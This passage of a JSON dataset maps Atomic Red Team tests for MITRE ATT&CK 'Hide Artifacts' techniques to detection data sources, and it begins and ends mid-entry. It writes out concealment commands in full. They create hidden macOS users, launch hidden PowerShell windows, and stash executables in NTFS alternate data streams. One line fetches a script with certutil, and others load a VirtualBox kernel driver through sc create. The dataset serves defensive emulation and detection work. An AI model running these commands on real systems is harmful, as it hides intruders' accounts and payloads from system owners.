script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file stream" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1564.002", + "command_list": [ + "sudo dscl . -create /Users/APT UniqueID 333\n", + "sudo dscl . -create /Users/APT IsHidden 1\n" + ], + "commands": [ + { + "command": "sudo dscl . -create /Users/APT UniqueID 333\n", + "source": "atomics/T1564.002/T1564.002.yaml", + "name": "Atomic Red Team Test - Hide Artifacts: Hidden Users" + }, + { + "command": "sudo dscl . -create /Users/APT IsHidden 1\n", + "source": "atomics/T1564.002/T1564.002.yaml", + "name": "Atomic Red Team Test - Hide Artifacts: Hidden Users" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1564.002", + "display_name": "Hide Artifacts: Hidden Users", + "atomic_tests": [ + { + "name": "Create Hidden User using UniqueID < 500", + "auto_generated_guid": "4238a7f0-a980-4fff-98a2-dfc0a363d507", + "description": "Add a hidden user on macOS using Unique ID < 500 (users with that ID are hidden by default)\n", + "supported_platforms": [ + "macos" + ], + "input_arguments": { + "user_name": { + "description": "username to add", + "type": "String", + "default": "APT" + } + }, + "executor": { + "command": "sudo dscl . -create /Users/#{user_name} UniqueID 333\n", + "cleanup_command": "sudo dscl . -delete /Users/#{user_name}\n", + "elevation_required": true, + "name": "sh" + } + }, + { + "name": "Create Hidden User using IsHidden option", + "auto_generated_guid": "de87ed7b-52c3-43fd-9554-730f695e7f31", + "description": "Add a hidden user on macOS using IsHidden optoin\n", + "supported_platforms": [ + "macos" + ], + "input_arguments": { + "user_name": { + "description": "username to add", + "type": "String", + "default": "APT" + } + }, + "executor": { + "command": "sudo dscl . -create /Users/#{user_name} IsHidden 1\n", + "cleanup_command": "sudo dscl . -delete /Users/#{user_name}\n", + "elevation_required": true, + "name": "sh" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account creation", + "description": "A user account was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account metadata", + "description": "Data and information that describe a user account and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "user" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1564.003", + "command_list": [ + "Start-Process powershell.exe -WindowStyle hidden calc.exe\n" + ], + "commands": [ + { + "command": "Start-Process powershell.exe -WindowStyle hidden calc.exe\n", + "source": "atomics/T1564.003/T1564.003.yaml", + "name": "Atomic Red Team Test - Hide Artifacts: Hidden Window" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1564.003", + "display_name": "Hide Artifacts: Hidden Window", + "atomic_tests": [ + { + "name": "Hidden Window", + "auto_generated_guid": "f151ee37-9e2b-47e6-80e4-550b9f999b7a", + "description": "Launch PowerShell with the \"-WindowStyle Hidden\" argument to conceal PowerShell windows by setting the WindowStyle parameter to hidden.\nUpon execution a hidden PowerShell window will launch calc.exe\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "powershell_command": { + "description": "Command to launch calc.exe from a hidden PowerShell Window", + "type": "String", + "default": "powershell.exe -WindowStyle hidden calc.exe" + } + }, + "executor": { + "command": "Start-Process #{powershell_command}\n", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "command", + "relationship": "executed", + "target_data_element": "script" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "script" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7", + "https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html", + "https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1564.004", + "command_list": [ + "type C:\\temp\\evil.exe > \"C:\\Program Files (x86)\\TeamViewer\\TeamViewer12_Logfile.log:evil.exe\"\nextrac32 c:\\ADS\\\\procexp.cab c:\\ADS\\\\file.txt:procexp.exe\nfindstr /V /L W3AllLov3DonaldTrump c:\\ADS\\\\procexp.exe > c:\\ADS\\\\file.txt:procexp.exe\ncertutil.exe -urlcache -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1564.004/src/test.ps1 c:\\temp:ttt\nmakecab c:\\ADS\\\\autoruns.exe c:\\ADS\\\\cabtest.txt:autoruns.cab\nprint /D:c:\\ADS\\\\file.txt:autoruns.exe c:\\ADS\\\\Autoruns.exe\nreg export HKLM\\SOFTWARE\\Microsoft\\Evilreg c:\\ADS\\\\file.txt:evilreg.reg\nregedit /E c:\\ADS\\\\file.txt:regfile.reg HKEY_CURRENT_USER\\MyCustomRegKey\nexpand \\\\webdav\\folder\\file.bat c:\\ADS\\\\file.txt:file.bat\nesentutl.exe /y c:\\ADS\\\\autoruns.exe /d c:\\ADS\\\\file.txt:autoruns.exe /o \n", + "if (!(Test-Path C:\\Users\\Public\\Libraries\\yanki -PathType Container)) {\n New-Item -ItemType Directory -Force -Path C:\\Users\\Public\\Libraries\\yanki\n }\nStart-Process -FilePath \"$env:comspec\" -ArgumentList \"/c,type,c:\\windows\\system32\\cmd.exe,>,`\"#{ads_file_path}:#{ads_name}`\"\"\n", + "if (!(Test-Path C:\\Users\\Public\\Libraries\\yanki -PathType Container)) {\n New-Item -ItemType Directory -Force -Path C:\\Users\\Public\\Libraries\\yanki\n }\nStart-Process -FilePath \"$env:comspec\" -ArgumentList \"/c,type,#{payload_path},>,`\"C:\\Users\\Public\\Libraries\\yanki\\desktop.ini:#{ads_name}`\"\"\n", + "if (!(Test-Path C:\\Users\\Public\\Libraries\\yanki -PathType Container)) {\n New-Item -ItemType Directory -Force -Path C:\\Users\\Public\\Libraries\\yanki\n }\nStart-Process -FilePath \"$env:comspec\" -ArgumentList \"/c,type,#{payload_path},>,`\"#{ads_file_path}:desktop.ini`\"\"\n", + "echo cmd /c echo \"Shell code execution.\"> %temp%\\T1564.004_has_ads_cmd.txt:#{ads_filename}\nfor /f \"usebackq delims=?\" %i in (%temp%\\T1564.004_has_ads_cmd.txt:#{ads_filename}) do %i\n", + "echo cmd /c echo \"Shell code execution.\"> #{file_name}:adstest.txt\nfor /f \"usebackq delims=?\" %i in (#{file_name}:adstest.txt) do %i\n", + "echo \"test\" > $env:TEMP\\T1564.004_has_ads_powershell.txt | set-content -path test.txt -stream #{ads_filename} -value \"test\"\nset-content -path $env:TEMP\\T1564.004_has_ads_powershell.txt -stream #{ads_filename} -value \"test2\"\nset-content -path . -stream #{ads_filename} -value \"test3\"\n", + "echo \"test\" > #{file_name} | set-content -path test.txt -stream adstest.txt -value \"test\"\nset-content -path #{file_name} -stream adstest.txt -value \"test2\"\nset-content -path . -stream adstest.txt -value \"test3\"\n" + ], + "commands": [ + { + "command": "type C:\\temp\\evil.exe > \"C:\\Program Files (x86)\\TeamViewer\\TeamViewer12_Logfile.log:evil.exe\"\nextrac32 c:\\ADS\\\\procexp.cab c:\\ADS\\\\file.txt:procexp.exe\nfindstr /V /L W3AllLov3DonaldTrump c:\\ADS\\\\procexp.exe > c:\\ADS\\\\file.txt:procexp.exe\ncertutil.exe -urlcache -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1564.004/src/test.ps1 c:\\temp:ttt\nmakecab c:\\ADS\\\\autoruns.exe c:\\ADS\\\\cabtest.txt:autoruns.cab\nprint /D:c:\\ADS\\\\file.txt:autoruns.exe c:\\ADS\\\\Autoruns.exe\nreg export HKLM\\SOFTWARE\\Microsoft\\Evilreg c:\\ADS\\\\file.txt:evilreg.reg\nregedit /E c:\\ADS\\\\file.txt:regfile.reg HKEY_CURRENT_USER\\MyCustomRegKey\nexpand \\\\webdav\\folder\\file.bat c:\\ADS\\\\file.txt:file.bat\nesentutl.exe /y c:\\ADS\\\\autoruns.exe /d c:\\ADS\\\\file.txt:autoruns.exe /o \n", + "source": "atomics/T1564.004/T1564.004.yaml", + "name": "Atomic Red Team Test - Hide Artifacts: NTFS File Attributes" + }, + { + "command": "if (!(Test-Path C:\\Users\\Public\\Libraries\\yanki -PathType Container)) {\n New-Item -ItemType Directory -Force -Path C:\\Users\\Public\\Libraries\\yanki\n }\nStart-Process -FilePath \"$env:comspec\" -ArgumentList \"/c,type,c:\\windows\\system32\\cmd.exe,>,`\"#{ads_file_path}:#{ads_name}`\"\"\n", + "source": "atomics/T1564.004/T1564.004.yaml", + "name": "Atomic Red Team Test - Hide Artifacts: NTFS File Attributes" + }, + { + "command": "if (!(Test-Path C:\\Users\\Public\\Libraries\\yanki -PathType Container)) {\n New-Item -ItemType Directory -Force -Path C:\\Users\\Public\\Libraries\\yanki\n }\nStart-Process -FilePath \"$env:comspec\" -ArgumentList \"/c,type,#{payload_path},>,`\"C:\\Users\\Public\\Libraries\\yanki\\desktop.ini:#{ads_name}`\"\"\n", + "source": "atomics/T1564.004/T1564.004.yaml", + "name": "Atomic Red Team Test - Hide Artifacts: NTFS File Attributes" + }, + { + "command": "if (!(Test-Path C:\\Users\\Public\\Libraries\\yanki -PathType Container)) {\n New-Item -ItemType Directory -Force -Path C:\\Users\\Public\\Libraries\\yanki\n }\nStart-Process -FilePath \"$env:comspec\" -ArgumentList \"/c,type,#{payload_path},>,`\"#{ads_file_path}:desktop.ini`\"\"\n", + "source": "atomics/T1564.004/T1564.004.yaml", + "name": "Atomic Red Team Test - Hide Artifacts: NTFS File Attributes" + }, + { + "command": "echo cmd /c echo \"Shell code execution.\"> %temp%\\T1564.004_has_ads_cmd.txt:#{ads_filename}\nfor /f \"usebackq delims=?\" %i in (%temp%\\T1564.004_has_ads_cmd.txt:#{ads_filename}) do %i\n", + "source": "atomics/T1564.004/T1564.004.yaml", + "name": "Atomic Red Team Test - Hide Artifacts: NTFS File Attributes" + }, + { + "command": "echo cmd /c echo \"Shell code execution.\"> #{file_name}:adstest.txt\nfor /f \"usebackq delims=?\" %i in (#{file_name}:adstest.txt) do %i\n", + "source": "atomics/T1564.004/T1564.004.yaml", + "name": "Atomic Red Team Test - Hide Artifacts: NTFS File Attributes" + }, + { + "command": "echo \"test\" > $env:TEMP\\T1564.004_has_ads_powershell.txt | set-content -path test.txt -stream #{ads_filename} -value \"test\"\nset-content -path $env:TEMP\\T1564.004_has_ads_powershell.txt -stream #{ads_filename} -value \"test2\"\nset-content -path . -stream #{ads_filename} -value \"test3\"\n", + "source": "atomics/T1564.004/T1564.004.yaml", + "name": "Atomic Red Team Test - Hide Artifacts: NTFS File Attributes" + }, + { + "command": "echo \"test\" > #{file_name} | set-content -path test.txt -stream adstest.txt -value \"test\"\nset-content -path #{file_name} -stream adstest.txt -value \"test2\"\nset-content -path . -stream adstest.txt -value \"test3\"\n", + "source": "atomics/T1564.004/T1564.004.yaml", + "name": "Atomic Red Team Test - Hide Artifacts: NTFS File Attributes" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1564.004", + "display_name": "Hide Artifacts: NTFS File Attributes", + "atomic_tests": [ + { + "name": "Alternate Data Streams (ADS)", + "auto_generated_guid": "8822c3b0-d9f9-4daf-a043-49f4602364f4", + "description": "Execute from Alternate Streams\n\n[Reference - 1](https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f)\n\n[Reference - 2](https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/)\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "path": { + "description": "Path of ADS file", + "type": "Path", + "default": "c:\\ADS\\" + } + }, + "executor": { + "command": "type C:\\temp\\evil.exe > \"C:\\Program Files (x86)\\TeamViewer\\TeamViewer12_Logfile.log:evil.exe\"\nextrac32 #{path}\\procexp.cab #{path}\\file.txt:procexp.exe\nfindstr /V /L W3AllLov3DonaldTrump #{path}\\procexp.exe > #{path}\\file.txt:procexp.exe\ncertutil.exe -urlcache -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1564.004/src/test.ps1 c:\\temp:ttt\nmakecab #{path}\\autoruns.exe #{path}\\cabtest.txt:autoruns.cab\nprint /D:#{path}\\file.txt:autoruns.exe #{path}\\Autoruns.exe\nreg export HKLM\\SOFTWARE\\Microsoft\\Evilreg #{path}\\file.txt:evilreg.reg\nregedit /E #{path}\\file.txt:regfile.reg HKEY_CURRENT_USER\\MyCustomRegKey\nexpand \\\\webdav\\folder\\file.bat #{path}\\file.txt:file.bat\nesentutl.exe /y #{path}\\autoruns.exe /d #{path}\\file.txt:autoruns.exe /o \n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Store file in Alternate Data Stream (ADS)", + "auto_generated_guid": "2ab75061-f5d5-4c1a-b666-ba2a50df5b02", + "description": "Storing files in Alternate Data Stream (ADS) similar to Astaroth malware.\nUpon execution cmd will run and attempt to launch desktop.ini. No windows remain open after the test\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "payload_path": { + "description": "Path of file to hide in ADS", + "type": "Path", + "default": "c:\\windows\\system32\\cmd.exe" + }, + "ads_file_path": { + "description": "Path of file to create an ADS under", + "type": "Path", + "default": "C:\\Users\\Public\\Libraries\\yanki\\desktop.ini" + }, + "ads_name": { + "description": "Name of ADS", + "type": "String", + "default": "desktop.ini" + } + }, + "executor": { + "command": "if (!(Test-Path C:\\Users\\Public\\Libraries\\yanki -PathType Container)) {\n New-Item -ItemType Directory -Force -Path C:\\Users\\Public\\Libraries\\yanki\n }\nStart-Process -FilePath \"$env:comspec\" -ArgumentList \"/c,type,#{payload_path},>,`\"#{ads_file_path}:#{ads_name}`\"\"\n", + "cleanup_command": "Remove-Item \"#{ads_file_path}\" -Force -ErrorAction Ignore\n", + "name": "powershell" + } + }, + { + "name": "Create ADS command prompt", + "auto_generated_guid": "17e7637a-ddaf-4a82-8622-377e20de8fdb", + "description": "Create an Alternate Data Stream with the command prompt. Write access is required. Upon execution, run \"dir /a-d /s /r | find \":$DATA\"\" in the %temp%\nfolder to view that the alternate data stream exists. To view the data in the alternate data stream, run \"notepad T1564.004_has_ads.txt:adstest.txt\"\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "file_name": { + "description": "File name of file to create ADS on.", + "type": "String", + "default": "%temp%\\T1564.004_has_ads_cmd.txt" + }, + "ads_filename": { + "description": "Name of ADS.", + "type": "String", + "default": "adstest.txt" + } + }, + "executor": { + "command": "echo cmd /c echo \"Shell code execution.\"> #{file_name}:#{ads_filename}\nfor /f \"usebackq delims=?\" %i in (#{file_name}:#{ads_filename}) do %i\n", + "cleanup_command": "del #{file_name} >nul 2>&1\n", + "name": "command_prompt" + } + }, + { + "name": "Create ADS PowerShell", + "auto_generated_guid": "0045ea16-ed3c-4d4c-a9ee-15e44d1560d1", + "description": "Create an Alternate Data Stream with PowerShell. Write access is required. To verify execution, the the command \"ls -Recurse | %{ gi $_.Fullname -stream *} | where stream -ne ':$Data' | Select-Object pschildname\"\nin the %temp% direcotry to view all files with hidden data streams. To view the data in the alternate data stream, run \"notepad.exe T1564.004_has_ads_powershell.txt:adstest.txt\" in the %temp% folder.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "file_name": { + "description": "File name of file to create ADS on.", + "type": "String", + "default": "$env:TEMP\\T1564.004_has_ads_powershell.txt" + }, + "ads_filename": { + "description": "Name of ADS file.", + "type": "String", + "default": "adstest.txt" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "The file must exist on disk at specified location (#{file_name})\n", + "prereq_command": "if (Test-Path #{file_name}) { exit 0 } else { exit 1 }\n", + "get_prereq_command": "New-Item -Path #{file_name} | Out-Null\n" + } + ], + "executor": { + "command": "echo \"test\" > #{file_name} | set-content -path test.txt -stream #{ads_filename} -value \"test\"\nset-content -path #{file_name} -stream #{ads_filename} -value \"test2\"\nset-content -path . -stream #{ads_filename} -value \"test3\"\n", + "cleanup_command": "Remove-Item -Path #{file_name} -ErrorAction Ignore\n", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file stream" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1564.006", + "command_list": [ + "\"C:\\Program Files\\Oracle\\VirtualBox\\VBoxSVC.exe\" /reregserver\nregsvr32 /S \"C:\\Program Files\\Oracle\\VirtualBox\\VboxC.dll\"\nrundll32 \"C:\\Program Files\\Oracle\\VirtualBox\\VBoxRT.dll,RTR3Init\"\nsc create VBoxDRV binpath= \"C:\\Program Files\\Oracle\\VirtualBox\\drivers\\VboxDrv.sys\" type= kernel start= auto error= normal displayname= PortableVBoxDRV\nsc start VBoxDRV\n", + "\"#{vboxmanage_exe}\" createvm --name \"Atomic VM\" --register\n\"#{vboxmanage_exe}\" modifyvm \"Atomic VM\" --firmware efi\n\"#{vboxmanage_exe}\" startvm \"Atomic VM\"\n", + "\"#{vboxmanage_exe}\" createvm --name \"#{vm_name}\" --register\n\"#{vboxmanage_exe}\" modifyvm \"#{vm_name}\" --firmware efi\n\"#{vboxmanage_exe}\" startvm \"#{vm_name}\"\n", + "\"C:\\Program Files\\Oracle\\VirtualBox\\VBoxManage.exe\" createvm --name \"#{vm_name}\" --register\n\"C:\\Program Files\\Oracle\\VirtualBox\\VBoxManage.exe\" modifyvm \"#{vm_name}\" --firmware efi\n\"C:\\Program Files\\Oracle\\VirtualBox\\VBoxManage.exe\" startvm \"#{vm_name}\"\n", + "$VM = \"Atomic VM\"\nNew-VM -Name $VM -Generation 2\nSet-VMFirmware $VM -EnableSecureBoot Off\nStart-VM $VM" + ], + "commands": [ + { + "command": "\"C:\\Program Files\\Oracle\\VirtualBox\\VBoxSVC.exe\" /reregserver\nregsvr32 /S \"C:\\Program Files\\Oracle\\VirtualBox\\VboxC.dll\"\nrundll32 \"C:\\Program Files\\Oracle\\VirtualBox\\VBoxRT.dll,RTR3Init\"\nsc create VBoxDRV binpath= \"C:\\Program Files\\Oracle\\VirtualBox\\drivers\\VboxDrv.sys\" type= kernel start= auto error= normal displayname= PortableVBoxDRV\nsc start VBoxDRV\n", + "source": "atomics/T1564.006/T1564.006.yaml", + "name": "Atomic Red Team Test - Run Virtual Instance" + }, + { + "command": "\"#{vboxmanage_exe}\" createvm --name \"Atomic VM\" --register\n\"#{vboxmanage_exe}\" modifyvm \"Atomic VM\" --firmware efi\n\"#{vboxmanage_exe}\" startvm \"Atomic VM\"\n", + "source": "atomics/T1564.006/T1564.006.yaml", + "name": "Atomic Red Team Test - Run Virtual Instance" + }, + { + "command": "\"#{vboxmanage_exe}\" createvm --name \"#{vm_name}\" --register\n\"#{vboxmanage_exe}\" modifyvm \"#{vm_name}\" --firmware efi\n\"#{vboxmanage_exe}\" startvm \"#{vm_name}\"\n", + "source": "atomics/T1564.006/T1564.006.yaml", + "name": "Atomic Red Team Test - Run Virtual Instance" + }, + { + "command": "\"C:\\Program Files\\Oracle\\VirtualBox\\VBoxManage.exe\" createvm --name 